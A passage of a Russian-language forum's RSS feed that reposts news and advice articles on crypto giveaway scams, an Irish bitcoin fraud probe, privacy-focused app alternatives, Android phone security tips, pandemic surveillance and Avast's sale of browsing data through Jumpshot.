						&lt;p&gt;Они ждут, пока реальные аккаунты напишут в Твиттере, и публикуют ответ, чтобы все выглядело так, будто знаменитости разместили мошенничество среди миллионов своих подписчиков.&lt;/p&gt;
						&lt;p&gt;Twitter - популярная платформа, но мошенничество с бесплатными подарками также можно найти на YouTube, Facebook и Instagram.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Apr 2021 07:07:00 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=68#p68</guid>
		</item>
		<item>
			<title>Ирландская полиция расследует массовое мошенничество с биткойнами, кот</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=67#p67</link>
			<description>&lt;p&gt;Ирландская полиция расследует массовое мошенничество с биткойнами, которое якобы похитило миллионы у состоятельных людей&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Полиция Ирландии находится в состоянии повышенной готовности из-за растущего числа дел, связанных с мошенничеством с биткойнами, нацеленным на состоятельных людей в стране. Ситуация стала тревожной, поскольку власти уже заметили подозрительные операции на крупные суммы. Власти уже обыскали одно имущество, связанное с одним из подозреваемых. По данным The Irish Times, Гардаи (полиция Ирландии) расследует то, что они считают крупным крипто-мошенничеством, преступники которого могут проживать в стране. Местный банк уже выразил обеспокоенность по поводу подозрительной транзакции на 500 000 евро (586 500 долларов США) с неактивного счета. После опроса, проведенного Гардаем в отношении пожилого клиента, который хотел инвестировать такую сумму денег в то, что, по его мнению, было законной возможностью для криптовалютного бизнеса, он принял совет полиции не отправлять фиатные деньги. Но, по данным СМИ, похоже, что до того, как они заблокировали перевод 500 000 евро в кошелек преступников, имели место и другие аналогичные транзакции. Фактически, жертва хотела обменять деньги на криптовалюту, а затем поместить их в биткойн-кошелек (BTC), принадлежащий якобы мошенникам. Хотя на момент публикации в прессе не было произведено никаких арестов, ирландская полиция уже произвела обыск на территории на юге Дублина, предположительно связанной с некоторыми подозреваемыми. В отчете говорится, что мобильные телефоны, компьютеры, наличные деньги, дизайнерские сумки и ювелирные изделия были обнаружены и изъяты властями. Более того, расследования сосредоточены на том, как преступники - некоторые из них предположительно являются иностранными гражданами и проживают в Дублине - подошли к жертвам и завоевали их доверие.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Apr 2021 07:02:36 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=67#p67</guid>
		</item>
		<item>
			<title>6 конфиденциальных альтернатив приложениям, которые вы используете каж</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=63#p63</link>
			<description>&lt;p&gt;6 конфиденциальных альтернатив приложениям, которые вы используете каждый день&lt;br /&gt;6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №1&lt;br /&gt;Мессенджеры, карты, музыкальные плееры и многие другие популярные приложения собирают информацию о вас, чтобы зарабатывать на показе рекламы. Однако на рынке доступны их аналоги, которые помогут защитить ваши данные и ориентированы исключительно на сохранение конфиденциальности своих пользователей.&lt;/p&gt;
						&lt;p&gt;Большинство людей настолько привыкли использовать популярные приложения, что уже даже перестали задумываться о том, как они работают и сколько личной информации собирают о своих пользователях. Бесплатные программы, которые стали широко известными, зарабатывают на показе рекламы. Это означает, что они осуществляют сбор данных о ваших лайках, онлайн-активности и использовании сторонних приложений.&lt;/p&gt;
						&lt;p&gt;На рынке доступные более конфиденциальные варианты: приложения, которые защитят ваши данные от чужих глаз и нетерпеливых рекламодателей. Они легко могут получить ваше признание, если вы только познакомитесь с ними поближе.&lt;/p&gt;
						&lt;p&gt;Несомненно, Apple и Google используют разные подходы к конфиденциальности своих пользователей - Apple зарабатывает деньги, продавая свою технику, тогда как Google становится богаче, продавая рекламу, для чего необходим сбор данных и проведение профилирования. Несмотря на то, что Google обещает сохранить ваши личные данные в тайне, он действительно продает рекламу того профиля пользователя, который сам создает.&lt;/p&gt;
						&lt;p&gt;Для сравнения можно отметить, что многие приложения Apple уже достаточно хороши с точки зрения конфиденциальности. Это те же Safari, Mail и Apple Maps. Тем не менее, в этой статье будут представлены альтернативные программы для известных приложений, доступных как на Apple, так на Android.&lt;/p&gt;
						&lt;p&gt;Signal для обмена сообщениями&lt;br /&gt;6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №2&lt;br /&gt;Есть несколько популярных приложений для обмена текстовыми сообщениями, но немногие из них так же сильно ориентированы на конфиденциальность, как Signal (Android, iOS) и доступны сразу же на нескольких платформах. Как и следовало ожидать, в этой программе при отправке и получении сообщений используется сквозное шифрование. Более того, есть опция исчезающих сообщений, так что вы не оставите никаких следов своей онлан-активности.&lt;/p&gt;
						&lt;p&gt;Хотя Signal, возможно, и не имеет богатый функционал, как некоторые другие мессенджеры, он поддерживает голосовые и видеозвонки, а также групповые чаты, передачу файлов, прослушивание аудио и открытие GIF-файлов. Ваша самая большая проблема может состоять только в том, чтобы убедить всех знакомых и друзей перейти на его использование каждый день.&lt;/p&gt;
						&lt;p&gt;Firefox для просмотра страниц в Интернете&lt;br /&gt;6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №3&lt;br /&gt;В то время как некоторые веб-браузеры уже долгое время обещают поставить конфиденциальность своих пользователей на первое место в списке своих приоритетов, Firefox (Android, iOS) уже является отличным браузером с точки зрения функций, кросс-платформенной совместимости и скорости работы. Впечатляющий список функций начинается с того, что Firefox называет улучшенной защитой, при которой наиболее агрессивные онлайн-трекеры автоматически блокируются при просмотре веб-страниц.&lt;/p&gt;
						&lt;p&gt;Погрузитесь глубже в безграничные настройки Firefox, и вы сможете сами выбирать, какие плагины нужно заблокировать, а также будете способны решить, какие данные должны собираться о вас при открытии новых сайтов и страниц в Интернете. Историю просмотра можно стереть за пару нажатий клавиш. И, конечно, есть режим инкогнито, если вы хотите просматривать сайты, не оставляя никаких следов своих действий.&lt;/p&gt;
						&lt;p&gt;DuckDuckGo для поиска информации в Интернете&lt;br /&gt;6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №4&lt;br /&gt;Привлекательность DuckDuckGo (Android, iOS) заключается в том, что он действительно не заинтересован в отслеживании того, что вы ищете в Интернете, и показе рекламы на основе вашей личной информации. Открытые вкладки и историю просмотров можно удалить в один клик, в то время как трекеры, с которыми вы сталкиваетесь во время своего путешествия по страницам сайтов в Интернете, автоматически блокируются, чтобы они не смогли отслеживать ваши действия.&lt;/p&gt;
						&lt;p&gt;Приложение DuckDuckGo на самом деле является веб-браузером и поисковиком в одном флаконе. Отдельным сайтам присваивается рейтинг конфиденциальности по мере их посещения вами, и приложение предоставляет вам полную информацию о том, какие компании пытаются отслеживать ваши перемещения в Интернете. Простой и эффективный способ оставаться конфиденциальным во время своей онлайн-деятельности.&lt;/p&gt;
						&lt;p&gt;OsmAnd для ориентирования на местности (картографическое приложение)&lt;br /&gt;6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №5&lt;br /&gt;Работа OsmAnd (Android, iOS) базируется на данных, получаемых от OpenStreetMap, своего рода эксперта в сфере картографических приложений. Эта программа имеет полный набор функций, как и любые другие карты: пошаговые инструкции, просмотр карт в автономном режиме, информация о достопримечательностях и общественных местах рядом с вами. Более того, приложение не создает ваш маркетинговый профиль для его продажи рекламодателям.&lt;/p&gt;
						&lt;p&gt;Есть поддержка режима построения маршрута во время езды на велосипеде и ходьбы пешком, а также во время вождения транспортного средства. Пользователи могут сами выбрать вид карты, а также имеют возможность быстро добавлять в закладки или делиться определенными точками на карте. Вы также способны купить определенные области на карте для их просмотра, но в самом начале можно бесплатно скачать семь карт определенной местности по вашему выбору.&lt;/p&gt;
						&lt;p&gt;ProtonMail для отправки писем по электронной почте&lt;br /&gt;6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №6&lt;br /&gt;Если вы хотите, чтобы ваша электронная почта была защищена от посторонних глаз, а анализ отправки сообщений не содействовал показу рекламы и рекомендациям других сервисов, то ProtonMail (Android, iOS) — один из лучших доступных на рынке вариантов. Это программа с открытым исходным кодом, полученные и отправленные сообщения в которой полностью зашифрованы. Она также имеет такую классную функцию, как самоуничтожающиеся сообщения.&lt;/p&gt;
						&lt;p&gt;Все необходимое шифрование происходит в самой программе, поэтому все, что вы видите, — это удобная почта с привычными вами функциями, такими как фильтрация сообщений и папка спам. ProtonMail предоставляет вам полную конфиденциальность ведь никто, кроме предполагаемых получателей, не сможет прочитать ваши сообщения (включая саму команду разработчиков). Стоит отметить, что большинство функций доступны абсолютно бесплатно.&lt;/p&gt;
						&lt;p&gt;Jumbo для пользования социальными сетями&lt;br /&gt;6 конфиденциальных альтернатив приложениям, которые вы используете каждый день, изображение №7&lt;br /&gt;Jumbo (Android, iOS) не является как таковой заменой приложениям для пользования социальными сетями, но программа может помочь вам защитить данные в социальных сетях, где вы и ваши друзья уже зарегистрированы. Это касается Instagram, Facebook и Twitter. Большинство функций программы платные, однако много опций доступны и без оформления надлежащей подписки.&lt;/p&gt;
						&lt;p&gt;Одна из лучших функций, которой обладает Jumbo, - это автоматическое удаление ваших постов по истечении определенного времени, так что вы никогда не будете оставлять за собой цифровых следов. Приложение также подскажет вам, как повысить конфиденциальность в ваших социальных сетях (например, отключив распознавание лиц или отметки на фото друзей).&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Thu, 18 Mar 2021 17:59:13 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=63#p63</guid>
		</item>
		<item>
			<title>Семь секретов, которые не дадут взломать ваш Android-смартфон</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=62#p62</link>
			<description>&lt;p&gt;Семь секретов, которые не дадут взломать ваш Android-смартфон&lt;br /&gt;Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №1&lt;br /&gt;Инструкция, как защитить ваши данные на телефоне. Всё, чтобы вы чувствовали себя в безопасности.&lt;/p&gt;
						&lt;p&gt;Вся ваша жизнь — на устройстве у вас в руках. От почты и личных сообщений до фотографий и видео с самыми ценными моментами — все это в телефоне. Скорее всего, он не защищен достаточно, чтобы обезопасить ваши данные от нежелательного доступа. Это актуально и для телефона, которым вы пользуетесь несколько лет, и для только что купленного.&lt;/p&gt;
						&lt;p&gt;В защите от взлома существуют две стороны, цифровая и физическая. Цифровая — это информация, которую телефон собирает о вас. Физическая — физический доступ к телефону. Представим ситуацию: телефон украли и вор шантажирует вас при помощи фото — для этого нужна физическая сторона защиты.&lt;/p&gt;
						&lt;p&gt;Перед «прокачкой» телефона стоит поговорить о Google, компании, которая разрабатывает операционную систему Android. Она — один из крупнейших сборщиков данных. Её бизнес-модель выглядит так: рекламодатель хочет рассказать о своём продукте, выбирает целевую аудиторию (например, люди, которые ищут информацию о телевизорах), а Google показывает этой группе рекламу. То есть, продает данные о своих пользователях.&lt;/p&gt;
						&lt;p&gt;Так что, если вы хотите большей конфиденциальности при повседневном использовании телефона, возможно, вам стоит подумать о переходе на iOS. Если не хотите переходить, вот несколько способов улучшить конфиденциальность вашего Android-устройства.&lt;/p&gt;
						&lt;p&gt;Изучите азы&lt;br /&gt;Изучение основ — это первое, с чего следует начать. Первая линия защиты — это блокировка экрана. Кстати, ПИН-код или пароль лучше, чем графический ключ.&lt;/p&gt;
						&lt;p&gt;Стоит использовать менеджер паролей для создания уникальных паролей от всех онлайн-аккаунтов. Также лучше убедиться, что двухфакторная аутентификация включена для как можно большего количества учетных записей. Если у какого-либо из сервисов произойдёт утечка данных, злоумышленники могут подобрать данные для других аккаунтов. С менеджером паролей и двухфакторной авторизацией у них ничего не получится.&lt;/p&gt;
						&lt;p&gt;Автоматическое обновление приложений должно быть включено. Это защитит от багов, которыми могут воспользоваться злоумышленники. Для приложений — в настройках Play Store включите их автоматическое обновление. Для всей операционной системы Android — в настройках найдите «обновления системы». Учтите, что у каждого телефона этот пункт может находиться в разных местах.&lt;/p&gt;
						&lt;p&gt;Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №2&lt;br /&gt;Также стоит зайти в настройки приложений в Android и проверить, какие разрешения вы предоставили каждому приложению: вполне вероятно, что у некоторых можно отключить доступ к геолокации или доступ к фотографиям.&lt;/p&gt;
						&lt;p&gt;Мы изучили основы — теперь переходим к чему-то более серьезному.&lt;/p&gt;
						&lt;p&gt;Поставьте пароль на приложения&lt;br /&gt;У вас уже есть пароль или PIN-код на телефоне, чтобы его не могли разблокировать, если он попадет в чужие руки. Но иногда этого недостаточно. Бывает, что вы даёте уже разблокированный телефон другому человеку — например, показываете кому-то фотографии или даёте поиграть своим детям. Тогда стоит поставить дополнительный пароль на приложения. В отличие от Apple, Google позволяет программам запрашивать разрешение на управление другими программами. Это означает, что возможна блокировка паролем отдельных приложений.&lt;/p&gt;
						&lt;p&gt;Чтобы заблокировать одно приложение, понадобится другое приложение. Таких программ куча в Play Store, поэтому стоит быть осторожным. Если в нём полно рекламы, нет четкой политики конфиденциальности или оно не от надежного разработчика, то вам, вероятно, следует избегать его.&lt;/p&gt;
						&lt;p&gt;Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №3&lt;br /&gt;Norton App Lock — неплохое решение для начала. Оно от надёжного разработчика — предыдущий продукт компании Norton VPN — один из самых популярных VPN в мире. Программа позволяет использовать один и тот же пароль для отдельных приложений или групп приложений.&lt;/p&gt;
						&lt;p&gt;У Xiomi есть системная блокировка приложений. В настройках зайдите в «приложения», там в «безопасность приложений». Выберите нужные приложения и поставьте пароль. Теперь в них можно будет войти, только если правильно ввести пароль.&lt;/p&gt;
						&lt;p&gt;Скройте уведомления&lt;br /&gt;Хоть мы сейчас и не особо часто выходим из дома, нет ничего более унизительного, чем чувство, когда кто-то смотрит через плечо в общественном транспорте и видит всплывающие уведомления с сообщениями.&lt;/p&gt;
						&lt;p&gt;Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №4&lt;br /&gt;Этого можно избежать. В настройках найдите «уведомления», там выберите «экран блокировки» и поставьте «скрывать содержимое уведомлений». Теперь содержимое уведомлений не будет показываться на экране блокировки.&lt;/p&gt;
						&lt;p&gt;Проверьте на сталкерские приложения&lt;br /&gt;В 2020 году идет тревожный рост использования сталкерских приложений. На телефонах сталкерское ПО проявляется в виде приложений, работающих в фоновом режиме, которые могут записывать и отслеживать все, что делает человек. Приложение легко не заметить, если не искать его специально.&lt;/p&gt;
						&lt;p&gt;Это приложение может попасть вместе с вирусом из Интернета или если кто-то, у кого есть доступ к смартфону, без вашего ведома установит его.&lt;/p&gt;
						&lt;p&gt;Если кто-то установил на ваше устройство сталкерское ПО, есть несколько признаков, по которым можно его заметить. Например, телефон сильно нагревается и быстро разряжается.&lt;/p&gt;
						&lt;p&gt;Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №5&lt;br /&gt;Если такое происходит, телефон стоит проверить антивирусными програмами. Например, антивирусом Касперского и антивирусом Avast.&lt;/p&gt;
						&lt;p&gt;Используйте VPN&lt;br /&gt;VPN — не самое надежное средство защиты, но оно может помочь. Программа создает зашифрованное соединение от вашего устройства к удаленному серверу и пропускает через него интернет-трафик: это не позволяет вашему интернет-провайдеру знать и хранить историю браузера. Журналисты, активисты и люди, стремящиеся избежать государственной слежки, являются одними из самых частых пользователей VPN.&lt;/p&gt;
						&lt;p&gt;Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №6&lt;br /&gt;Но какой VPN выбрать? Существует много VPN, и все они стоят по-разному. Лучше всего выбрать платный VPN — с ними меньше шансов, что компания будет продавать ваши данные рекламодателям. У них часто есть семейные планы, по которым сетью можно пользоваться с нескольких устройств — можно пользоваться и с телефона, и с компьютера. У Wired есть список лучших VPN, на первых местах там Windscribe и ExpressVPN. Они оба работают быстро, также они доказали, что не хранят журналы активности в интернете, в отличие от некоторых других VPN.&lt;/p&gt;
						&lt;p&gt;Измените приложения по умолчанию&lt;br /&gt;Если у вас телефон на Android, вы, вероятно, не задумывались о приложениях, которые используете для поиска, голосовых помощников, телефона и SMS. Этим летом Google сделал экран выбора на новых телефонах Android, после того, как Европейская комиссия по вопросам конкуренции оштрафовала компанию на 3,8 миллиарда фунтов стерлингов. Этот экран позволяет выбрать свою поисковую систему при первоначальной настройке. То есть, можно выбрать что-то кроме Google.&lt;/p&gt;
						&lt;p&gt;Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №7&lt;br /&gt;В настройках найдите пункт «приложения», выберите «все приложения», сверху будут три точки или шестеренка, там будут «приложения по умолчанию». В этом меню можно поменять приложения на те, которые вы используете чаще. Можно поменять не только поиск, но браузер, голосового помощника, голосовой ввод, приложение для звонков и приложение для SMS. Несколько альтернатив с повышенной безопасностью: браузер Firefox, браузер и поиск DuckDuckGo, приложение для SMS — Signal.&lt;/p&gt;
						&lt;p&gt;Зашифруйте все&lt;br /&gt;Пароль защитит ваши данные от слишком любопытного родственника или от воришки, который украл ваш телефон на улице. Но только на таком примитивном уровне. Если кто-то по-настоящему захочет получить данные с телефона, пароль не будет для него помехой — он просто подключится напрямую к диску. Чтобы избежать этого, необходимо зашифровать диск. Шифрование подразумевает, что к файлам не сможет получить доступ никто, кто пытается извлечь их с вашего устройства, если у него нет пароля. «Шифрование гарантирует, что даже если неавторизованная сторона попытается получить доступ к данным, они не смогут их прочитать», — утверждает Google.&lt;/p&gt;
						&lt;p&gt;Семь секретов, которые не дадут взломать ваш Android-смартфон, изображение №8&lt;br /&gt;Вы можете зашифровать свой телефон через настройки — в поиске наберите «зашифровать» и выберите «зашифровать данные». Для этого вам нужно будет ввести или создать PIN-код и убедиться, что телефон заряжен. Шифрование всего устройства может занять некоторое времени, поэтому, вероятно, лучше это сделать, когда не вы не будете им пользоваться. Google сделал обязательным шифрование устройств с Android с 2015 года и прилагает все усилия, чтобы сделать его менее ресурсоемким на более дешевых устройствах.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Thu, 18 Mar 2021 17:58:31 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=62#p62</guid>
		</item>
		<item>
			<title>Эксперты рассказали, как власти по всему миру следят за гражданами во</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=61#p61</link>
			<description>&lt;p&gt;Эксперты рассказали, как власти по всему миру следят за гражданами во время пандемии&lt;br /&gt;Эксперты рассказали, как власти по всему миру следят за гражданами во время пандемии, изображение №1&lt;br /&gt;Весной 2020 года «РосКомСвобода» совместно с белорусской правозащитной организацией Human Constanta запустила интерактивную карту Pandemic Big Brother , на которой отображаются случаи нарушения и предпосылки к нарушениям гражданских прав с применением цифровых технологий.&lt;/p&gt;
						&lt;p&gt;В общей сложности было выявлено 135 специальных приложений для отслеживания контактов с больными COVID-19 в 116 странах мира. В зависимости от преследуемых целей программы использовались для предоставления официальной информацию о заболеваемости в регионе, для самодиагностики или для отслеживания контактов с зараженными с помощью технологии Bluetooth или GPS-трекера, для отслеживания соблюдения обязательного карантина больными COVID-19, для выдачи цифровых пропусков и QR-кодов на перемещение или для выявления правоохранительными органами наличия цифровых пропусков и иных разрешений на время обязательного карантина.&lt;/p&gt;
						&lt;p&gt;Технологии видеонаблюдения, в том числе с функцией распознавания лиц использовались правительствами разных стран для наблюдения за соблюдением режима самоизоляции и поимки нарушителей обязательного карантина. На сегодняшний день только власти Бельгии запретили на законодательном уровне использовать технологии распознавания лиц. Работа технологий распознавания лиц была протестирована в Арабских Эмиратах, Великобритании и Франции, а в Китае алгоритмы распознавания лиц способны распознавать людей даже в масках и определять наличие у них высокой температуры. Кроме того, в Китае сотрудники правоохранительных органов получили «умные шлемы» для автоматического измерения температуры тела окружающих людей и сканирования QR-кодов.&lt;/p&gt;
						&lt;p&gt;Для наблюдения за соблюдением гражданами ограничений на передвижение ряд стран обратился к помощи дронов. Дроны «патрулировали» улицы и следили за тем, чтобы люди не собирались большими компаниями. Подобные технологии были замечены в Австралии, Бельгии, Германии, Греции, Италии, Испании, Китае, Казахстана, ОАЭ и США.&lt;/p&gt;
						&lt;p&gt;Власти Москвы, в свою очередь, во время пандемии активно внедряли технологии распознавания лиц в систему городского видеонаблюдения. Почти 1,5 млрд рублей было потрачено на оснащение общественного транспорта камерами с распознаванием лиц.&lt;/p&gt;
						&lt;p&gt;Для отслеживания распространения коронавируса и мониторинга за соблюдением карантина правительства разных стран используют геоданные пользователей интернета и абонентов сотовой связи, полученные от мобильных операторов. В Европе как минимум 8 операторов сотовой связи согласились предоставлять Еврокомиссии данные о передвижениях граждан для прогнозирования распространения заболеваемости COVID-19.&lt;/p&gt;
						&lt;p&gt;Например, масштабная слежка за гражданами через данные сотовых операторов была запущена в Казахстане, а ее инициатором стала крупнейшая местная телекоммуникационная компания. Управление цифровизации Акимата г. Алматы заключило соглашение о сотрудничестве с местными сотовыми операторами, в рамках которого был составлен геолокационный анализ для отображения активности абонентов мобильных операторов и выявляет места скопления абонентов на ежечасной основе. Сотовые операторы также передавали властям и данные о звонках каждого абонента.&lt;/p&gt;
						&lt;p&gt;Сбор данных о местоположении пользователей также был обнаружен в Австралии, Испании, Чехии, Великобритании, Бразилии, Эквадоре, Словакии, Швейцарии, Китае и Иране, где правительство объяснило это защитой населения и предотвращением риска развития и распространения COVID-19.&lt;/p&gt;
						&lt;p&gt;В России Минкомсвязь еще в марте требовала от региональных властей предоставлять обезличенные списки номеров мобильных телефонов людей, инфицированных коронавирусом, а также тех, кто находится на обязательном карантине по возвращению из-за границы.&lt;/p&gt;
						&lt;p&gt;Эксперты полагают, что количество инструментов слежки в 2021 году будет только увеличиваться, и вряд ли ограничения прав и свобод граждан с применением цифровых технологий и возможностей операторов связи будут сняты в ближайшее время.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Thu, 18 Mar 2021 17:56:42 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=61#p61</guid>
		</item>
		<item>
			<title>Тайный рынок Avast. Как антивирусы продают вашу историю браузера</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=60#p60</link>
			<description>&lt;p&gt;Тайный рынок Avast. Как антивирусы продают вашу историю браузера&lt;br /&gt;Тайный рынок Avast. Как антивирусы продают вашу историю браузера, изображение №1&lt;br /&gt;Дочерняя компания разработчика антивируса Avast продавала каждый поисковой запрос. Каждое нажатие. Каждую покупку. С каждого сайта. Среди его клиентов были, Google, Microsoft, Pepsi и другие.&lt;/p&gt;
						&lt;p&gt;Данный эпизод произошел год назад. После расследования, компания Avast заявила, что остановит сбор данных для компании Jumpshot и прекратит все операции с ней в неотложном порядке. Мы перевели эту захватывающую историю целиком и предлагаем вам прочитать и сделать выводы.&lt;br /&gt;Как показало совместное расследование Motherboard и PCMag, антивирус Avast, который используется миллионами людей по всему миру, продает конфиденциальные данные своих пользователей крупным компаниям. Утечка внутренних документов доказывает торговлю строго конфиденциальными данными, включая историю браузеров пользователей.&lt;/p&gt;
						&lt;p&gt;Документы от дочерней компании Avast, под названием Jumpshot, проливают свет на секретную торговлю и цепочки поставок историй браузеров пользователей. Они показывают, что после установки Avast на свой компьютер, он начинает сбор данных и передает их компании Jumpshot, после чего они продаются многим мировым компаниям таким, как Google, Yelp, Microsoft, McKinsey, Pepsi, Home Depot, Cond&amp;#233; Nast, Intuit и другим. Некоторые из этих компаний платят миллионы долларов, чтобы получать данные о каждом вашем нажатии, что позволяет им анализировать ваше поведение в сети.&lt;/p&gt;
						&lt;p&gt;Пользовательская база Avast составляет около 435 миллионов пользователей и 100 миллионов устройств. Все они подписали пользовательское соглашение предусматривающее сбор данных, но некоторые из пользователей сообщили Motherboard и PCMag, что не знали какие именно данные собираются или, что они вообще собираются. Возникает вопрос, насколько хорошо были информированы пользователи?&lt;/p&gt;
						&lt;p&gt;О каких именно данных идет речь? О поисковых запросах в Google, переходах между веб сайтами, GPS координатах с Google Maps, посещений LinkedIn, YouTube и порно сайтов. Хоть эти данные не содержат никаких имен, но на их основе можно с легкостью идентифицировать пользователей.&lt;/p&gt;
						&lt;p&gt;В июле компания Jumpshot утверждала, что раскрывает данные, чтобы маркетологи имели более глубокое представление о рынке в Интернете. Jumpshot ранее публично упоминала некоторых из своих клиентов, как Expedia, IBM, Intuit, TurboTax, Loreal и Home Depot. Сотрудникам рекомендовали не говорить публично об отношениях Jumpshot с этими компаниями.&lt;/p&gt;
						&lt;p&gt;До недавнего времени Avast обирал данные с помощью расширения браузера, которое было создано для того, чтобы ограничивать доступ к вредоносным веб сайтам. Исследователь по кибербезопасности и создатель AdBlock Plus Владимир Палант опубликовал об этом пост в своем блоге. А немного позже Mozilla, Opera и Google Chrome удалили это расширение из своих браузеров. Ранее Avast уже объяснял этот сбор данных и обмен ими в блоге и на форуме в 2015 году. С тех пор Avast пообещал прекратить отправлять данные просмотра, собранные этими расширениями, в Jumpshot, говорится в заявлении Avast для Motherboard и PCMag.&lt;/p&gt;
						&lt;p&gt;Однако, сбор данных все же продолжился. Если раньше Avast делал это через расширение браузера, то теперь он стал это делать это через свой антивирус&lt;/p&gt;
						&lt;p&gt;Тайный рынок Avast. Как антивирусы продают вашу историю браузера, изображение №2&lt;br /&gt;Издания Motherboard и PCMag связались с более чем двумя десятками компаний, упомянутых во внутренних документах. Лишь немногие ответили на вопросы о том, что они делают с данными, основанными на истории поиска пользователей Avast.&lt;/p&gt;
						&lt;p&gt;&amp;quot;Иногда мы используем информацию от сторонних поставщиков, чтобы улучшить наш бизнес, продукты и услуги. Мы требуем, чтобы эти поставщики имели соответствующие права на передачу нам этой информации. В этом случае мы получаем анонимные данные о пользователях, которые нельзя использовать для идентификации отдельных клиентов&amp;quot;, - написал представитель Home Depot в заявлении по электронной почте.&lt;br /&gt;Microsoft отказалась комментировать особенности того, почему она приобретала данные у Jumpshot, но заявила, что сейчас она не имеет отношений с этой компанией. Southwest Airlines заявила, что обсуждала возможность работы с Jumpshot, но компании не достигли соглашения. IBM заявила, что не была клиентом, а Altria заявила, что тоже не работает с Jumpshot, хотя не уточнила, работала ли ранее. Sephora заявила, что не работает с Jumpshot. Компания Google так и не ответила на запрос.&lt;/p&gt;
						&lt;p&gt;На своем веб-сайте и в пресс-релизах Jumpshot называет клиентами Pepsi и консалтинговых гигантов Bain &amp;amp; Company и McKinsey. Там также перечислены некоторые примеры использования данных об истории просмотра веб страниц. Издательство и цифровой медиа-гигант Cond&amp;#233; Nast, например, использовал продукты Jumpshot, чтобы увидеть, приводит ли реклама компании к увеличению продаж на Amazon и в других местах.&lt;/p&gt;
						&lt;p&gt;All Click Feed&lt;br /&gt;Это не все, был еще один продукт Jumpshot под названием All Click Feed. Он позволяет покупать информацию обо всех кликах, которые Jumpshot регистрировал в определенном домене, например Amazon.com, Walmart.com, Target.com, BestBuy.com или Ebay.com.&lt;/p&gt;
						&lt;p&gt;Данные Jumpshot могут показать, как кто-то с установленным на компьютере антивирусом Avast искал продукт в Google, переходил по ссылке, ведущей на Amazon, затем, возможно, добавлял товар корзину на каком-то другом веб-сайте, прежде чем совершить покупку.&lt;/p&gt;
						&lt;p&gt;Согласно копии контракта с Jumpshot, одной из компаний, купивших All Clicks Feed, является маркетинговая фирма Omnicom Media Group из Нью-Йорка. Jumpshot предоставил Omnicom доступ ко всем кликам пользователей из 14 разных стран мира, включая США, Англию, Канаду, Австралию и Новую Зеландию. Данные также включали в себя предполагаемый пол пользователей, их предполагаемый возраст и «полную строку URL-адреса», но с удаленной личной информацией, заявляется в контракте.&lt;/p&gt;
						&lt;p&gt;Согласно контракту с Omnicom, «идентификатор устройства» каждого пользователя хешируется, а это означает, что компания, покупающая данные, не должна иметь возможность идентифицировать, кто именно стоит за каждым просмотром. Вместо этого продукты Jumpshot должны помогать компаниям узнавать, какие продукты особенно популярны или насколько эффективна их рекламная кампания.&lt;/p&gt;
						&lt;p&gt;Но данные Jumpshot могут быть не полностью анонимными. Во внутреннем справочнике по продукту говорится, что идентификаторы устройств не меняются для каждого пользователя, если он полностью не удалит и не переустановит программное обеспечение безопасности. Многочисленные статьи и академические исследования показали, как можно узнать личность человека, используя якобы анонимные данные. Это подтвердили репортеры New York Times в 2006 году, а также исследователи из Стэндфордского университета в 2017 году.&lt;/p&gt;
						&lt;p&gt;Деанонимизация становится куда более серьезной проблемой, если вспомнить о том, что конечные покупатели данных Jumpshot могут объединить их со своими собственными данными.&lt;/p&gt;
						&lt;p&gt;&amp;quot;Большинство угроз, создаваемых деанонимизацией, исходит из способности объединять информацию с другими данными&amp;quot;.&lt;br /&gt;Временная метка с точностью до миллисекунды может позволить компании, имеющей собственный банк данных о клиентах, видеть, как один пользователь посещает их собственный сайт, а затем следить за ними через другие сайты с помощью Jumpshot.&lt;/p&gt;
						&lt;p&gt;&amp;quot;Обезличить данные практически невозможно, - сказал Эрик Голдман, профессор юридического факультета Университета Санта-Клары.&lt;br /&gt;Журналисты из Motherboard и PCMag задали Avast ряд подробных вопросов о том, как она защищает анонимность пользователей, а также детали некоторых контрактов компании. Avast не ответил на большинство вопросов, но написал в заявлении: &amp;quot;Благодаря нашему подходу мы гарантируем, что Jumpshot не получит никакой идентификационной информации, включая имя, адреса электронной почты или контактные данные, от людей, использующих наше популярное бесплатное антивирусное программное обеспечение&amp;quot;.&lt;/p&gt;
						&lt;p&gt;&amp;quot;У нас большой опыт защиты устройств и данных пользователей от вредоносных программ, и мы понимаем и серьезно относимся к ответственности за балансирование конфиденциальности пользователей с необходимым использованием данных », - говорится в заявлении.&lt;br /&gt;Также компания заявила, что соблюдает Калифорнийский закон о конфиденциальности потребителей (CCPA) и Европейский регламент по защите данных (GDPR) касательно всей своей пользовательской базы.&lt;/p&gt;
						&lt;p&gt;Когда редактор PCMag впервые установил антивирусный продукт Avast, программа действительно спросила, хотят ли они принять участие в сборе данных.&lt;/p&gt;
